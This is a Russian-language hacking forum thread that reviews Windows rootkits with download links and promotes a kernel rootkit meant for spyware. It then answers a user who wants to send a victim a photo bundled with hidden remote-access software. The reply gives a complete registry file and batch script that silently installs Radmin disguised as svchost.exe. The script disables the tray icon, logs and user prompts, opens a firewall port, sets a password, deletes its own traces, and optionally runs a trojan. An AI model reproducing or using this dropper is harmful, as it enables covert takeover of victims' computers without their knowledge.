Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Обзор: Rootkit for Windows |
09.04.2007, 15:08
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613
Репутация:
1365
|
|
Обзор: Rootkit for Windows
Intro
Я сильно удивился, когда узнал что много людей не имеют представления о существовании руткитов для Windows.
Hacker Defender - Многие считают этот Руткит самым лучшим.Обладает стандартным набором функций,постоянная поддержка производителя и грамотно реализованный алгоритм работы.
Download: http://www.xfocus.net/tools/200401/621.html
eEye BootRoot - Первый публично продемонстрированый NDIS бэкдор. Работающий по принципу boot-вируса.
Руткит работает в перехвате тринадцатого прерывания и внедрения в загрузчик Windows в момент загрузки с диска.
Методом в внедрения в драйвер NDIS.SYS после его подгрузки в память.Задача драйвера: сканирование всего входящего Ethernet траффика и поиска специально сформированного пакета, после обнаружения такого пакета, происходит выполнение кода с привилегиями ядра системы.
Download : http://www.xfocus.net/tools/200509/1088.html
FU Rootkit – Очень популярный руткит умеющий прятать процессы, поднимать права выполняемых процессов, прятать события, записываемые в Event Viewer, так что администратор не сможет из логов узнать об активности на его системе, и даже прятать драйвера устройств. Работает исключительно по технологии Direct Kernel Object Manipulation (TM) не используя стандартные для подобных программ функции перехвата API или Code Injection.
Download : https://www.rootkit.com/vault/fuzen_op/FU_Rootkit.zip
NT Rootkit – Наверное, самый старый из всех программ подобного типа, но до сих пор сохраняющий актуальность руткит. Висит в системе, ожидает соединения на любой порт, при коннекте выдает консоль. Умеет шифровать свой
трафик с использованием алгоритма Blowfish, прятать свои и защищенные объекты (файлы, ключи реестра, службы, и т.д.)
Download : http://www.rootkit.com/vault/fuzen_op/vice.zip
He4Hook – Руткит Российского производства, обладающий хорошим набором функций. Инсталлируется в системе и обеспечивает хакера удаленной консолью, пряча свои действия от системы.
Download : http://www.xfocus.net/tools/200502/993.html
AFX Rootkit 2005 - Этот Руткит перехватывает Windows API для сокрытия процессов,файлов,ключей реестра и портов. Очень прост в использовании, достаточно просто скопировать на удалённую машину. Работает в невидимом режиме, пряча свою собственную папку. Обнаруживаеться также легко даже без юзанья спец софта. Имхо Руткит для новичков.
Download : http://www.rootkit.com/vault/therealaphex/AFXRootkit2005.zip
Последний раз редактировалось zl0ba; 21.05.2007 в 12:01..
|
|
|
09.04.2007, 18:00
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723
Репутация:
1477
|
|
Что-то слабоват ваш обзор. Даже версии руткитов не указал. Все эти руткиты уже давно устарели, как морально, так и в плане изученности аверами. Лучше обратите внимание на BlackReleaver Rootkit от Cr4sh. Найти его можно на нашем сате http://hellknights.void.ru
Сообщение от Hell Knights Crew
Ядерный руткит от нашего гуру Cr4sh, предназначеный в первую очередь для использования в различном Spyware/RAT.
Функционал:
- скрывает процессы, файлы/папки, загруженые драйвера, ключи и параметры реестра
- перехват api-фций ядра методом сплайсинга
- перехватывает следующие ф-ции:
ZwOpenProcess
ZwOpenThread
ZwCreateFile
ZwOpenFile
ZwQueryDirectoryFile
ZwOpenKey
ZwEnumerateKey
ZwSetValueKey
ZwDeleteValueKey
ZwEnumerateValueKey
- гибкая система рулесов по типам защищаемых обьектов
В архиве находятся исходники и бинарники самого руткита, а также usermode-оболочка к нему.
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
Последний раз редактировалось ShadOS; 09.04.2007 в 18:04..
|
|
|
|
09.04.2007, 18:14
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Вот тут, тоже есть описание http://cyberhack.ru/modules.php?name=News&file=print&sid=170
Кроме того была статья в ][ (непомню какой номер) там подробно все рассмотрены...
|
|
|
|
08.08.2008, 14:53
|
|
Новичок
Регистрация: 23.07.2008
Сообщений: 27
Провел на форуме:
49302
Репутация:
3
|
|
а вот что мне надо сделать !?я беру RAMIN(111.bat 123.bat и 3 файла 2 dll b 1 exe)запихиваю в sfx архив клею с фото и кидаю жертве!как сделать чтоб какой ниб руткит инсталился вместе с radmin и скрывал процесс!?если мона по действиям т.к. я новичок!
|
|
|
|
27.10.2009, 17:54
|
|
Новичок
Регистрация: 13.10.2009
Сообщений: 2
Провел на форуме:
24368
Репутация:
6
|
|
Сообщение от immortal16
а вот что мне надо сделать !?я беру RAMIN(111.bat 123.bat и 3 файла 2 dll b 1 exe)запихиваю в sfx архив клею с фото и кидаю жертве!как сделать чтоб какой ниб руткит инсталился вместе с radmin и скрывал процесс!?если мона по действиям т.к. я новичок!
Аналогично, мне бы тоже хотелось узнать )))
|
|
|
|
23.11.2009, 23:13
|
|
Познающий
Регистрация: 23.06.2008
Сообщений: 53
Провел на форуме:
114200
Репутация:
6
|
|
Сообщение от Nuc7ear
Аналогично, мне бы тоже хотелось узнать )))
для тихой установки радмина 2.0 версии я использовал архив с 5 файликами:
1) 111.reg
2) AdmDll.dll (стандартный файл радмина)
3) raddrv.dll (стандартный файл радмина)
4) svchost.exe (переименованый экзешник радмина)
5) START.bat
где:
111.reg - рег файл, настраивающий сервер
AdmDll.dll и raddrv.dll - стандартные библиотеки радмина
svchost.exe - переименованый екзешник рармин сервера
START.bat - командный файлик, выполняющий установку и конфигурацию радмина
итак сделаю некоторое лирическое отступление
версии радмина от 3.0 использовать не стоит по той причине, что в полной мере скрыто они работать не будут. они будут выдавать окна подтверждения пользвоателю во время установки и настройки и они будут отсвечивать иконкой в трее, тогда как в версиях по 2.3 включительно это все скрывается через командную строку без участия конечного пользователя
для успешной работы радмина нужно чтобы три файлика (два длл и один екзе) лежали все в одной папке в абсолютно любом месте компа. они всеравно будут работать оттуда. также екзе файлик можно переименовывать чтоб он меньше отсвечивал в процессах
содержание рег файлика:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplis t]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters]
"NTAuthEnabled"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
; убирает иконку с трея при работе сервера. 00,00,00,00 - чтоб иконка висела
"EnableLogFile"=hex:00,00,00,00
; радмин не будет вести логов. соответственно 01,00,00,00 если нужно вести
"LogFilePath"="c:\\logfile.txt"
; путь к лог файлу если всетаки его нужно вести
"FilterIp"=hex:00,00,00,00
; нужен ли фильтр по айпи или будет доступ независимо от айпи
"AskUser"=hex:00,00,00,00
; не спрашивать пользователя при подключении клиента к серверу
[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
"Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5, 89,e4,b9,49,c8,49,00,1c,eb,\
18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74 ,94,4f,49,42,46,f7,ab,05,\
1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28
содержание бат файлика:
@echo off
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
netsh firewall add allowedprogram "%Windir%\help\svchost.exe" "Remote Administrator Server" ENABLE
@ добавляет в встроеный фаервол исключение для приложения
netsh firewall add portopening TCP 4899 radm
@ открывает порт для приложения в встроеном фаерволе винды
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
@ вытягивает все сведения о предыдущей версии радмина в файлик 123.рег
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
@ удаляет все сведения о предыдущих версиях радмина
copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"
@ копирует нужные файлы в директорию откуда он будет работать
reg import 111.reg
@ импортирует настройки из 111.рег в реестр
regedit /s 111.reg
@ кажется та же самая команда но для версий винды до ХР
"%SYSTEMROOT%/help\svchost.exe" /install /silence
@ запустить инсталяцию при этом не уведомлять пользователя
"%SYSTEMROOT%/help\svchost.exe" /port:4899 /pass:1754+ /save /silence
@ установить порт, установить пароль, сохранить изменения, не уведомлять пользователя
"%SYSTEMROOT%/help\svchost.exe" /start
@ запустить сервис
del svchost.exe
del raddrv.dll
del AdmDll.dll
del 111.reg
del 123.reg
del START.bat
@ удалить все использованые файлы в текущей ппки во избежание палива О_о
для разнообразия можешь кинуть в эту же папку любой трой и запустить его дописав в .бат файл строчку с точный названием файла
выглядеть это будет так:
@echo off
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
netsh firewall add allowedprogram "%Windir%\help\svchost.exe" "Remote Administrator Server" ENABLE
netsh firewall add portopening TCP 4899 radm
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"
reg import 111.reg
regedit /s 111.reg
"%SYSTEMROOT%/help\svchost.exe" /install /silence
"%SYSTEMROOT%/help\svchost.exe" /port:4899 /pass:1754+ /save /silence
"%SYSTEMROOT%/help\svchost.exe" /start
fuck.exe
del svchost.exe
del raddrv.dll
del AdmDll.dll
del 111.reg
del 123.reg
del START.bat
где fuck.exe - твой трой
вообще вот тема о радмине:
http://www.forum.antichat.ru/threadnav13658-1-10.html
Последний раз редактировалось F3x111TsSL; 23.11.2009 в 23:57..
|
|
|
|
07.09.2008, 07:03
|
|
Banned
Регистрация: 27.04.2008
Сообщений: 683
Провел на форуме:
3248203
Репутация:
628
|
|
джойнер
|
|
|
|
25.06.2009, 21:53
|
|
Участник форума
Регистрация: 05.05.2009
Сообщений: 262
Провел на форуме:
373836
Репутация:
53
|
|
Джойнер...Хорошо расписал :-)
|
|
|
|
27.10.2009, 20:29
|
|
Постоянный
Регистрация: 28.09.2008
Сообщений: 456
Провел на форуме:
2244151
Репутация:
404
|
|
Лопатки не сломали?
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид